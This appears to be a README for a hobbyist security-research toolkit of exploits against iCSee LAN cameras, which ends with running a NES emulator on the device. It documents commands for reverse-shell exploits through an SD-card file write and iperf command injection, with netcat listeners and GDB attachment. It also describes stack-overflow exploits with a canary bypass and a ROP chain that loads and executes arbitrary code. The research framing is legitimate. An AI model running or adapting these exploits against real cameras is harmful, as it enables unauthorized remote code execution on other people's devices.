
This is a suite of tools/PoCs/exploits for cameras using the iCSee application. And yes - it can run NES games!
This is a suite of tools/PoCs/exploits that can be used iCSee video-call cameras via LAN (and maybe non-video call cameras as well). This could easily be used to flash alternative firmwares as a replacement for the SD card update method.
Note: Any memory corruption exploit will only work if your cameras firmware version is V5.00.R02.000949U5.10000.141324.0000010 or V5.00.R02.000807E5.10000.346724.0000010 - these exploits rely on fixed offsets, which change every time the firmware is built.
[0] Enumeration, Teardown and Firmware Extraction
[1] Learning the Cameras Language
[2] Finding Useless Integer Overflows + Some Useful Bugs
[3] Death by Stack Overflows + Canary Fun
[5] Different Camera, Same App
[6] Vindication + Full Memory Corruption Exploit on Second Camera
[7] Emulating NES Games on the Camera
pycryptodome : For RSA login cryptpwntools : For shellcodepyftpdlib : For FTP serverpynput : For NES keyboard inputget_system_infoThis uses the get_system_info method to fetch information about the camera via port 34567.
python3 icseeu.py get_system_info
{
"Name": "SystemInfo",
"Ret": 100,
"SessionID": "0x0001869f",
"SystemInfo": {
"AlarmInChannel": 0,
"AlarmOutChannel": 0,
"AudioInChannel": 1,
"BuildTime": "2024-06-27 10:33:41",
"CombineSwitch": 0,
"DeviceModel": "IPC_GK7201V300_G2-WR-V_S38",
"DeviceRunTime": "0x000026c6",
"DeviceType": 7,
"DigChannel": 0,
"EncryptVersion": "Unknown",
"ExtraChannel": 0,
"HardWare": "IPC_GK7201V300_G2-WR-V_S38",
"HardWareVersion": "Unknown",
"Pid": "A909409U5000000N",
"SerialNo": "bf7816d59506ec06",
"SoftWareVersion": "V5.00.R02.000949U5.10000.141324.0000010",
"TalkInChannel": 1,
"TalkOutChannel": 1,
"UpdataTime": "",
"UpdataType": "0x00000000",
"VideoInChannel": 1,
"VideoOutChannel": 1
}
}
ftp_get_logsUses some left-over text functionality to pull logs off of the device (logs end up in FTPTestDir/Test).
python3 icseeu.py ftp_get_logs
gdb_revshellExploits an SD card file write vulnerability, and the iperf binary execution vulnerability that allows remote execution of a binary present on the SD card, to get a reverse shell and start up a GDB debugger which attaches to the main App process.
Terminal 1:
nc -l 1234
Terminal 2:
python3 icseeu.py gdb_revshell
Terminal 3:
gdb-multiarch
gef-remote 192.168.188.2 8888
Note: Do not stop the program for more than 30 second or the watchdog complains and the App process will restart!
Note 2: You may need to modify hardcoded IP addresses in the payload (GDB_Revshell/remote_mgmt.c) to be the IP of your machine on the LAN and rebuild the payload.
gdb_revshell_injectExploits an SD card file write vulnerability, and the iperf command injection vulnerability that allows remote execution of a binary present on the SD card, to get a reverse shell and start up a GDB debugger which attaches to the main App process.
This is useful for device that already have an iperf binary present, which prevents the other method.
Terminal 1:
nc -l 1234
Terminal 2:
python3 icseeu.py gdb_revshell_inject
Terminal 3:
gdb-multiarch
gef-remote 192.168.188.2 8888
Note: Do not stop the program for more than 30 second or the watchdog complains and the App process will restart!
Note 2: You may need to modify hardcoded IP addresses in the payload (GDB_Revshell/remote_mgmt.c) to be the IP of your machine on the LAN and rebuild the payload.
iperf_inject_exploitExploits the iperf command injection to establish a reverse shell.
Terminal 1:
nc -l 1234
Terminal 2:
python3 icseeu.py iperf_inject_exploit
Note: You may need to modify hardcoded IP addresses in the payload (Revshell_Inject/remote_mgmt.c) to be the IP of your machine on the LAN and rebuild the payload.
These are exploits for the second stack overflow in the handler for message type 0x7d8. This overflow is interesting because it allows us to bypass the stack canary and get execution.
You'll need to build the dispatcher payload before these will work (run make in PayloadDispatcher directory), and the payload you want to run on the camera by running make in the respective directories (e.g. ImageDisplay).
Notes:
screenflashDemonstrates that we have code execution by flashing the screen.
python3 icseeu.py exploit_goke screenflash
rgbDemonstrates that we have control of the screen by flashing RGB colours.
python3 icseeu.py exploit_goke rgb
imagedisplayUses the file write to upload a raw RGB 5:6:5 image, run ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565 -f rawvideo image.raw on an image in the directory to get an image.raw file in the ImageDisplay directory for this to work. The image will be displayed on the screen.
python3 icseeu.py exploit_goke imagedisplay
buttontestDemonstrates that we can read the state of the buttons, flashes a colour when one of the buttons is detected to have been pressed.
python3 icseeu.py exploit_goke buttontest
pongA minimal implementation of the Pong game that demonstrates we have control of the screen and the buttons on the front, also demonstrates a slightly more complex payload.
python3 icseeu.py exploit_goke pong
nesA ported NES emulator that can play the rom.nes placed in the GOKE_Payloads/nes directory, run make in GOKE_Payloads/nes/smolnes and GOKE_Payload/nes to generate binaries.
python3 icseeu.py exploit_goke nes
This is an exploit for a stack overflow on another camera with no stack canaries, but with NX. I wrote a ROP-chain to pivot the stack and get execution of a large ROP-chain, this ROP-chain maps executable memory, loads the contents of a file into the memory, spawns a thread that executes it, then fixes up the stack state and continues execution.
You'll need to build the payload before these will work, run make in the respective directories (e.g. ImageDisplay).